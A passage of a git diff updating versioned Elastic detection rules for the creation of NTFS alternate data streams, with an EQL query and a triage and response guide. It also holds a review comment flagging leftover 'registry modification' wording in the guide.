@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \"C:\\\\*:zone.identifier*\" and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { 
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_108.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_108.json
index e008b2d91fe..90f14892863 100644
--- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_108.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \"C:\\\\*:zone.identifier*\" and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", "related_integrations": [ { 
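Review bot: The added `note` line in this hunk still closes its investigation steps with `searching for login events (for example, 4624) to the target host after the registry modification`, but this rule alerts on the creation of an alternate data stream, not on a registry change, so the phrase reads like a leftover from a registry-based rule's guide. The commit only unescapes `\u003e` to `>` on this line, so the wording is pre-existing, yet the added line is the one now shipped and is where it should be corrected, e.g. `... to the target host after the alternate data stream was created.` The same wording appears in the `_109.json` hunk below and presumably in `_110.json`, whose hunk is cut off at the end of this view. Since these files are versioned rule snapshots, the fix may belong in a new rule version rather than an in-place edit.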
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_109.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_109.json
index 31710a22168..90488b42801 100644
--- a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_109.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual File Creation - Alternate Data Stream", - "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
